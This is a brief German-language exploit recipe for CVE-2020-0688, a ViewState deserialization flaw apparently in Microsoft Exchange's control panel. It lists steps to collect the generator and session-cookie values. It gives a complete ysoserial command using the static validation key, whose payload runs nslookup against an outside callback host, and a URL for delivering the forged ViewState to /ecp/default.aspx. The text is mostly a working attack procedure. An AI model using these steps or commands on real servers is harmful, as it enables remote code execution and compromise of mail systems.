
cve-2020-0688
cve-2020-0688
Die Anmeldung mit einem Benutzer, der über eine E-Mail-Adresse verfügt, ist unproblematisch.
Hole __VIEWSTATEGENERATOR aus dem Seitenquelltext
Hole den Wert des ASP.NET_SessionId-Cookies für den viewstateuserkey-Wert
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
AUFRUFEN:
https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>
Die Exploit.py ist ungetestet und benötigt ein Demosystem, um gestartet und ausprobiert zu werden.